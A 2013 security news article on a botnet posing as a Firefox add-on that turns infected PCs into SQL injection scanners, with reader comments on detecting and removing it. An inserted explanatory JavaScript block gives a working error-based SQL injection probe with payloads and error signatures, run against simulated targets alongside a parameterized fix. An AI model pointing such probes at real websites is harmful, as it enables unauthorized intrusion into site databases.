December 16, 2013

An unusual botnet that has ensnared more than 12,500 systems disguises itself as a legitimate add-on for Mozilla Firefox and forces infected PCs to scour Web sites for security vulnerabilities, an investigation by KrebsOnSecurity has discovered.

The botnet, dubbed “Advanced Power” by its operators, appears to have been quietly working since at least May 2013. It’s not clear yet how the initial infection is being spread, but the malware enslaves PCs in a botnet that conducts SQL injection attacks on virtually any Web sites visited by the victim.

The “Advanced Power” botnet installs itself as a legitimate Firefox extension. The malware looks for vulnerabilities in Web sites visited by the victim.

SQL injection attacks exploit Web applications that build database queries by splicing user-supplied input straight into the SQL text, without escaping or parameterizing it, so that a crafted request is run as commands against the database behind the public-facing Web server. Attackers can use this access to booby-trap sites with drive-by malware attacks, or force sites to cough up information stored in their databases.

Although this malware does include a component designed to steal passwords and other sensitive information from infected machines, this feature does not appear to have been activated on the infected hosts. Rather, the purpose of this botnet seems to be using the compromised Windows desktops as a distributed scanning platform for finding exploitable Web sites. According to the botnet’s administrative panel, more than 12,500 PCs have been infected, and these bots in turn have helped to discover at least 1,800 Web pages that are vulnerable to SQL injection attacks.

The fraudulent Firefox add-on.

The malicious code comes from sources referenced in this Malwr writeup and this VirusTotal entry (please don’t go looking for this malware unless you really know what you’re doing). On infected systems with Mozilla Firefox installed, the bot code installs a browser extension called “Microsoft .NET Framework Assistant” (this bogus add-on does not appear to be the same thing as this add-on by the same name). The malicious add-on then takes nearly every page request the infected user makes, tampers with it, and tests the site for the presence of several different SQL injection vulnerabilities.
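To make the two mechanics above concrete, here is an added example written for this page. It is not the botnet’s code, not KrebsOnSecurity’s, and not from any real site: a request handler that concatenates a URL parameter into SQL, a parameterized alternative, and an error-based probe that, like the add-on described above, starts from a URL the user actually visited, mutates each parameter and looks for database error messages in the reply. Everything in it is assumed for illustration: the payload list, the error signatures, the host shop.example, and every function name. The target is simulated in-process so the code runs offline.

```javascript
// Added example, not the botnet's code nor the article's: an error-based SQL
// injection probe seeded from a URL the user really visited, run against an
// in-process simulated target. Payloads, signatures, shop.example and every
// function name below are assumptions made for illustration.

// Database error fragments that leak into a response when a quote-breaking
// payload reaches a query built by string concatenation (illustrative set).
const ERROR_SIGNATURES = [
  /You have an error in your SQL syntax/i,                // MySQL
  /Unclosed quotation mark after the character string/i,  // MSSQL
  /syntax error at or near/i,                             // PostgreSQL
  /ORA-\d{5}/,                                            // Oracle
];

// Values appended to an existing parameter to break a string literal or
// change the statement's logic (illustrative, far from exhaustive).
const PAYLOADS = ["'", '"', "' OR '1'='1", ' AND 1=2'];

// One variant per (parameter, payload) pair; the other parameters stay as the
// user sent them, which is what keeps the request "valid" for the site.
function mutateUrl(urlString) {
  const base = new URL(urlString);
  const variants = [];
  for (const name of base.searchParams.keys()) {
    for (const payload of PAYLOADS) {
      const u = new URL(urlString);
      u.searchParams.set(name, base.searchParams.get(name) + payload);
      variants.push({ param: name, payload, url: u.toString() });
    }
  }
  return variants;
}

// fetchFn(url) -> { status, body }. Returns the (parameter, payload) pairs
// whose response body matched a database error signature.
function probe(urlString, fetchFn) {
  const findings = [];
  for (const v of mutateUrl(urlString)) {
    const res = fetchFn(v.url);
    const hit = ERROR_SIGNATURES.find((re) => re.test(res.body));
    if (hit) findings.push({ param: v.param, payload: v.payload, status: res.status });
  }
  return findings;
}

// ---- Simulated targets (constructed for this example) ----------------------

// Vulnerable: the parameter is spliced into the SQL text. No database is
// involved; an odd number of single quotes stands in for the parser choking.
function vulnerableHandler(params) {
  const sql = `SELECT * FROM items WHERE id = '${params.get('id')}'`;
  const quoteCount = (sql.match(/'/g) || []).length;
  if (quoteCount % 2 !== 0) {
    return {
      status: 500,
      body: 'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version',
    };
  }
  return { status: 200, body: `<html>item ${params.get('id')}</html>` };
}

// Hardened: placeholder plus bound value. The value is data to the driver and
// never reaches the SQL parser, whatever quotes it contains.
function hardenedHandler(params) {
  const stmt = { text: 'SELECT * FROM items WHERE id = ?', values: [params.get('id')] };
  return { status: 200, body: `<html>item ${stmt.values[0]}</html>` };
}

// Wrap a handler as a synchronous fetch over the URL's query string.
function makeFetch(handler) {
  return (urlString) => handler(new URL(urlString).searchParams);
}

// A URL of the kind a victim's browser would hand the add-on (constructed).
const VISITED = 'http://shop.example/product?id=42&lang=en';

console.log('vulnerable:', JSON.stringify(probe(VISITED, makeFetch(vulnerableHandler))));
console.log('hardened:  ', JSON.stringify(probe(VISITED, makeFetch(hardenedHandler))));
```

Run it with node. Against the vulnerable handler the probe reports only the bare quote on id: the tautology payload leaves the quote count balanced, so an error-based check never sees it, which is why real scanners add boolean- and time-based comparisons on top. Mutating lang produces nothing because that value is never used in a query, and the parameterized handler is never flagged because the input never reaches the SQL parser as code.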

Alex Holden, chief information security officer at Hold Security LLC, said the botnet appears to have been built to automate the tedious and sometimes blind guesswork involved in probing sites for SQL vulnerabilities.

“When you test an application for SQL injection or any other vulnerability, you have a small frame of reference as to the site’s functionality,” Holden said. “You often don’t know or can’t see many user functions. And in some cases you need proper credentials to do it right. In this case, the hackers are using valid requests within many sites that end-users themselves are feeding them. This is a much bigger sample than you would normally get. By no means is it a full regression test, but it is a deep and innovative approach.”

Holden said he believes the authors of this botnet may be natives of and/or reside in the Czech Republic, noting that a few transliterated text strings in the malware are auto-detected by Google Translate as Czech.

SQL injections are some of the most common Web site attacks partly because these vulnerabilities are extremely widespread. According to a report (PDF) released earlier this year from Web site security firm Imperva (full disclosure: Imperva is an advertiser on this site), while most Web applications receive four or more attack campaigns each month, some Web sites are constantly under attack — particularly Web apps at retail sites.

Sites browsed by hacked PCs (left) and SQL injection flaws found by the botnet (masked, right)

Botnets like this one are a great and classic example of how compromised systems are nearly always used to chip away at the defenses of others online. Interestingly, there is a legitimate add-on for Firefox that can help passively detect SQL injection vulnerabilities on sites you visit. Site owners looking for a free tool to scan their sites for SQL vulnerabilities should check out SQLmap, an open source penetration testing tool.

Update, 6:17 p.m. ET: Mozilla has issued a statement saying that it has “disabled the fraudulent Microsoft .NET Framework Assistant add-on used by the Advanced Power botnet,” by adding the bogus add-on to its block list. Mozilla said Firefox gets a message during a check for blocked add-ons once a day — while the browser is running — and that the block does not require any user actions to take effect.


51 thoughts on “Botnet Enlists Firefox Users to Hack Web Sites”

  1. Intoy

    Hi Brian,
    can you tell us what this add-on looks like in the Firefox add-on list? For me there is such an add-on, but it could also be the legitimate one saying that it adds ClickOnce support. It also has the version number 0.0.0, which looks strange, but according to (http://support.microsoft.com/kb/963707/en) that’s okay.
    Thanks!

      1. Diane Wilkinson Trefethen

        Hi Brian,

        Note that in Firefox, when you go to Tools>Add-ons, “Microsoft .NET Framework Assistant 0.0.0” is in Extensions, not Plugins.

        Also, Brian, could you be a bit clearer about the link you provided? You said, “Know that the link referenced there is a lie; it’s a legitimate Microsoft domain, but it has nothing to do with this plugin.” Do you mean the link you provided shows how the imposter looks or do you mean that the link shows the real Microsoft plugin so it has nothing to do with the malware of the same name? Your image shows “Microsoft .NET Framework Assistant 0.1,” not “0.0.0”. Is “0.1” a true Microsoft upgrade to the real Microsoft extension or is either “0.0.0” or “0.1” a tip off that one has the malware? Note that your image has both “Disable” and “Remove.” My Firefox “0.0.0” has only “Disable”. Is that a clue that one has one or the other?

  2. DefendOurFree

    Does this malicious plug in work with other browsers?

    1. DefendOurFree

      I’m going to assume this MS Framework can run on other browsers. I don’t see Framework listed in my browser add-on list; however, I do have Silverlight running as a browser add-on. And as per the Microsoft website, “Silverlight is a free plug-in, powered by the .NET framework and compatible with multiple browsers”.

    2. Sandra

      While the official Microsoft addon works with multiple browsers, the malicious addon only works on Firefox (according to the article).

      1. DefendOurFree

        Thanks; but I didn’t read the article that way. Brian described the add-on in Firefox; but he did disclaimer exclusiveness.

        Brian, is this exclusive to Firefox?

        1. BrianKrebs Post author

          No idea. But when I had a look at the back end system for this botnet, I only saw what that screenshot shows: page after page of mozilla firefox icons. I have nothing to suggest any other browsers were impacted.

  3. User

    Hello.

    If the link is correct, then the last modification of windowsclient.com.xpi was made on Thu 30 May 2013.
    Also, the algorithm generating domain names is not working as expected (advpmaster122013.org, advpmaster112013.org, …), or the software is just too old.
    Also, there is an executable (.exe) on VirusTotal and Malwr, and the extension is an .xpi.
    And to finish, I can see a few interesting comments like:
    …callBack(null); return;}// sdelat zapis ob oshibke
    …// sent request to verify parametr
    that indicate that the author is most probably from Russia.

  4. Sandra

    I have also “Microsoft .NET Framework Assistant 0.0.0” in my list of Firefox extensions. It is disabled.

    So can we assume that if the extension is disabled, the malware is not active? How do I find out if I have the real thing from Microsoft or if I have the malware? I would be very grateful.

    Thanks, Sandra

    1. PC Cobbler

      This is what I would do. Look in Control Panel -> Programs for “Microsoft .NET Framework Assistant” and uninstall it if it exists. Save your list of Firefox bookmarks to a temporary file. Uninstall Firefox via Control Panel -> Programs. Download CCleaner from piriform.com, install it (don’t accept the free offer of Chrome), run the Registry cleaner, and run the regular Cleaner. Download the free version of Malwarebytes from malwarebytes.org, install it (don’t accept the free trial), and do a system scan with it (take the defaults if malware is found). Then reinstall Firefox and only add back the add-ons you trust, e.g. No Script.

      1. onlinekook

        Please don’t use CCleaners registry cleaning feature. As a matter of fact, don’t use ANY registry cleaners, unless you want to break your computer. The only thing you should be doing to your registry is backing it up. Really.

        1. PC Cobbler

          I use CCleaner on all of my PCs, as well as those of my customers. I have never had a problem and I do this for a living. CCleaner gives the option of making a backup of the registry so one can always revert back to the previous version. Really.

          1. Harry Johnston

            So … if you used a registry cleaner on a client computer and it broke something (fairly likely) … how would you know?

            Registry cleaners have no magical way of telling what registry entries are “no longer needed”. They just guess. If they guess wrong, well, something breaks, but the user has no way of knowing what caused the problem, so that’s all good … for the people selling the snake oil, that is.

            1. PC Cobbler

              “how would you know?”

              I would run a few tests before I returned the PC back to the customer. These would not be shots in the dark, but educated guesses based on what was removed. And if the customer complained, I would run back to fix it. But that’s never happened.

              “Registry cleaners have no magical way of telling what registry entries are ‘no longer needed’. They just guess.”

              Wrong. They compare the contents of the registry with what is installed and what directories are present.

              I do not know if all registry cleaners are trustworthy. Perhaps your comments are valid for the other ones. I only know about CCleaner.

              1. onlinekook

                Blindly running registry “cleaners” is rather irresponsible. What is it “fixing”?
                If there is a problem with the registry, then you fix that specific problem, otherwise there is no need to mess around with the registry. Sure you may “clean” your registry and not have a problem, but you run a huge risk when you blindly go in there and delete things. You may not realize a problem until weeks later when you run a program that is used infrequently.
                While you might not break the machine running a “registry cleaner” the risk is not worth it. Eventually that risk will become a real problem.

                1. Ed Tomchin

                  The solution to that problem is easy. Just back up your registry before you clean it. In fact, it’s not a bad idea to back up your registry as often as you back up your root drive.

                  1. Harry Johnston

                    But what do you do if there’s a problem six months later? You can’t just restore a six-month old registry file, that’s asking for trouble.

                2. PC Cobbler

                  @onlinekook “Blindly running registry ‘cleaners’ is rather irresponsible. What is it ‘fixing’?”

                  First, I never stated that anyone should run them “blindly”; that is your word. CCleaner should be run if a known problem exists. You do know that malware hides in the registry, right?

                  Second, what is your alternative solution for malware in the registry? You seem to be suggesting that we should just leave it there, which will allow the malware to remain. Or perhaps you are suggesting that novices use regedit, which is irresponsible advice.

                  Third, as I stated before, CCleaner gives an option of making a backup before cleaning so users can revert back to the original configuration. I would always recommend making a backup.

                  “Eventually that risk will become a real problem”

                  I run CCleaner many times per week on different systems and have yet to see a problem.

                  Disclosure: I have no financial stake in Piriform.

                  1. Harry Johnston

                    Uh … if you go back to your first comment in this subthread, you instruct a novice who may have a malware infection (but probably does not) to run CCleaner. That counts as “blindly” in my book.

                    If you’re an expert, and use CCleaner only as a tool to help locate suspicious entries, that’s a different matter.

              2. Harry Johnston

                In order for that to work reliably, the registry cleaner would have to contain an accurate database of every piece of software in existence and what registry keys it needs. That’s not going to happen.

        1. PC Cobbler

          “Given that I most probably don’t have the malicious addon, I find removing Firefox a bit overkill.”

          The operative word here is “probably.” You are much more trusting than I am. Then again, I have been known to completely reinstall Windows if something does not feel right.

  5. Ed Tomchin

    I also found “Microsoft .NET Framework Assistant 0.0.0” on my Firefox 26.0. It was enabled but I disabled it. There does not appear to be any means of removing it, however. Can you expound further on how to find out if this is malware and how it can be removed? Thank you.

  6. I thought I was computer savy.

    by CanopusArchives on September 28, 2013

    “You can only remove it when you do this:
    In Registry Editor:
    – Go to
    HKEY_LOCAL_MACHINE \ SOFTWARE \ Mozilla \ Firefox \ Extensions
    – Delete value {20a82645-c095-46ed-80e3-08825760534b}
    In Firefox:
    – Go to about:config
    – enter microsoftdotnet in Filter
    – Right-click general.useragent.extra.microsoftdotnet
    – select Reset.
    – Restart Firefox.”

    NOTE: In later editions of Firefox it is only the above key that needs to be deleted, there is no corresponding entry in about:config. Restarting Firefox after deleting the key will no longer display this add-on in add-ons

    https://addons.mozilla.org/en-US/firefox/addon/microsoft-net-framework-assist/

    1. PC Cobbler

      I will just add that regedit is serious business. Make sure you know what you are doing before you attempt it. Screwing up the registry is one route to a new OS install.

    2. Sandra

      These are the instructions for removing the official Microsoft plugin. This will not remove the malicious addon.

  7. TheOreganoRouter.onion

    Very interesting article. Where do I find more information on that “Microsoft .NET Framework Assistant”?

  8. ejonesss

    “http://krebsonsecurity.com/wp-content/uploads/2013/12/3a.png”

    looks like the botnet may be going after porn in some way

    just look at the names of the files in the last 5 window

    1. jdmurray

      The Malware searches for vulnerabilities on whatever site the user browses to, so it’s not the botnet that chose those sites.

  9. Vee

    https://www.virustotal.com/en/file/19b523e0db7d612dd439147956589b0c7fe264f1eb183ea3a74565ad20d3cb8a/analysis/1370035125/

      Looking at the VirusTotal link, at 33 / 49 this version of the thing is pretty much dead if someone has even a mediocre AV. (But also know they probably pump out newer versions of this thing too.)

    How it’s installed is a pretty common technique I’ve seen, you know the old “Hey install this plugin to view this content click here! Adobeflash.exe”.

    1. Wladimir Palant

      Jerry, version 0.0.0 is the real add-on by the same name, produced by Microsoft – not the malware Brian talks about. In fact, 0.0.0 is the dummy version for people who opted out of ClickOnce functionality, it doesn’t do anything. Nothing wrong with removing it completely of course.

  10. Wladimir Palant

    Hi Brian,

    I couldn’t resist peeking into the source code of this add-on. Two things that stuck out to me:

    1. Mozilla’s blacklist is unlikely to have much effect because the infected browsers are extremely outdated – the add-on is only marked compatible with Firefox 2.0 to 6.0a1. “Compatible by default” was only enabled with Firefox 10 so that add-on won’t run in any newer Firefox version. Also, there is no custom update URL that could push a newer version of this add-on or override compatibility information.

    2. I found three non-English comments, Google Translate assumes one to be Czech, the other Slovenian and third is even considered to be Italian. This is pure nonsense of course because it only managed to translate a few words from the texts. In fact, these comments are quite clearly transliterated Russian, with a significant number of typos.

  11. Intoy

    Maybe one last remark. Does anybody know the Extension ID of the malware? The real one from Microsoft is {20a82645-c095-46ed-80e3-08825760534b}. You get it from Help -> Troubleshooting Information. Maybe the malware author also used this ID, but maybe not 🙂

      1. Intoy

        There we go. So people who are still unsure whether they have the malware, just check the extension ID.
        Thanks Wladimir

        1. Wladimir Palant

          Nobody asking here does – I doubt that Brian has any visitors with Firefox 5. Besides, the real Microsoft .Net Assistant is a lot more widespread than this malware.

          1. Harry Johnston

            I’m not certain that the malware is limited to old versions of Firefox. Sure, you couldn’t install it on current versions via the usual method, but then it isn’t meant to be installed via the usual method – couldn’t a malicious installer trick Firefox into accepting an “outdated” extension?

            1. Wladimir Palant

              I think you are right, I jumped to conclusions here. A third-party application would need to manipulate Firefox’ extensions database directly to change the compatibility information for that add-on. Yet disabling the opt-in screen for externally installed add-ons (something that malware is bound to do) requires doing exactly the same thing, so it is possible that somebody has actually done that. Still not very likely however – why go through all the trouble instead of simply setting compatibility info correctly in the first place?

              1. Harry Johnston

                Perhaps to make it that little bit harder for white hats to diagnose, or just in the hopes of confusing people? I don’t know, perhaps they really are only targeting old versions – maybe the vulnerability they used to install was only present in those versions? – but I don’t think we can safely conclude that without more information.

  12. Jacob Goodson

    Hey! Do not start posting stuff like this! We need to make sure we keep screaming how insecure Java is and how the internet is a pristine fortress of impenetrable magic that will solve our deepest, fantastical desires!

    1. Wladimir Palant

      The important sentence is “It’s not clear yet how the initial infection is being spread” – the initial infection quite possibly happens through a Java vulnerability. The people affected didn’t update Firefox in more than two years, they likely didn’t update Java either (updating Firefox is much easier). There, now you have it.

  13. Winski

    Capital punishment – NO money…. Slap a few of the Hack Pack in the electric chair and let’s see if they keep it up..

  14. David

    Hello Brian,
    if you send me some example comments from the code, I can tell you whether they’re written in Czech. It looks like our country has become quite popular in recent weeks (stolen bitcoins …)

Comments are closed.